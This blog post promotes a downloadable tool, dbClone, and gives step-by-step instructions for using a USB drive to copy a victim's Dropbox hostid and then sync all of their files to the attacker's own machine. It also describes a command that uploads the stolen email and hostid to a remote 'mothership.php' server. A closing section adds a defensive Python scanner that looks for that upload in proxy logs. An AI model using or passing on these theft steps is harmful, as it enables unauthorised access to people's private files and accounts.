The Hack o blog

Reinventing the weel

Dropbox authentication exploit, dbClone.


After reading this article on dereknewton.com about Dropbox’s insecure design, sablefoxx, a resourceful young coder on the forum, created a Python application to exploit the insecure design of Dropbox, the most popular file synchronisation tool.

Download dbClone from here or on the download page.
[1] Find a victim machine running Dropbox, insert your USB drive
[2] Run dbClone.exe, data will be saved in a .txt file
[3] On your own computer install the Dropbox client and run “dbClone.exe -i”
[4] Paste the ‘hostid’ from the .txt file into the ‘hostid’ prompt, and enter /any/ email
[5] Start up the Dropbox client, and sync all the files!!!

But Wait There’s More!:

Use -m to upload the email and hostid to your webserver (via GET), for example “dbClone.exe -m http://somesite.com” (note: it appends “mothership.php” to the URL); example code is in /src/mothership.php!

Tested on Windows 7 & Ubuntu 10.10 but should run on just about any Windows/Linux box without much fuss. They really should fix this problem; this program can also send the HostIds to a remote web server (for off-site backups, of course).

Source code is included.
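From the defender’s side, the one thing the -m option leaves behind is a proxy or web-server log entry: a GET to a URL ending in mothership.php that carries the email and hostid. The following is an added example, not code from the post or from dbClone, that scans such logs for that beacon; the log line format and the query-parameter names `email` and `hostid` are assumptions, and the sample lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample proxy log, not a real capture. Assumed line format:
# "<timestamp> <client-ip> <method> <url> <status>"
SAMPLE_LOG = """\
2011-04-12T10:01:02Z 10.0.0.15 GET http://somesite.com/mothership.php?email=a%40example.com&hostid=0123456789abcdef 200
2011-04-12T10:01:05Z 10.0.0.22 GET http://cdn.example.net/jquery.min.js 200
2011-04-12T10:02:11Z 10.0.0.15 GET http://somesite.com/index.php?hostid=notabeacon 200
2011-04-12T10:03:40Z 10.0.0.31 GET http://other.example.org/sub/mothership.php?hostid=abcdef0123456789&email=b%40example.com 404
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<status>\d{3})$"
)


def is_dbclone_beacon(url):
    """True if the URL looks like the dbClone -m upload: a request whose path
    ends in mothership.php and whose query carries both an email and a hostid.
    The parameter names are an assumption; the post only names the two values."""
    parts = urlsplit(url)
    if not parts.path.lower().endswith("/mothership.php"):
        return False
    qs = parse_qs(parts.query)
    return bool(qs.get("email")) and bool(qs.get("hostid"))


def find_beacons(log_text):
    """Return (timestamp, client, destination host) for every GET that matches.
    The status code is ignored on purpose: a failed upload still tells you
    which client had its Dropbox hostid read."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m.group("method") != "GET":
            continue
        if is_dbclone_beacon(m.group("url")):
            hits.append((m.group("ts"), m.group("client"), urlsplit(m.group("url")).hostname))
    return hits


if __name__ == "__main__":
    for ts, client, dest in find_beacons(SAMPLE_LOG):
        print(f"{ts} {client} uploaded a Dropbox hostid to {dest}")
```

A hit identifies the client whose hostid was copied, which is the machine whose Dropbox link should be unlinked and re-authorised.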
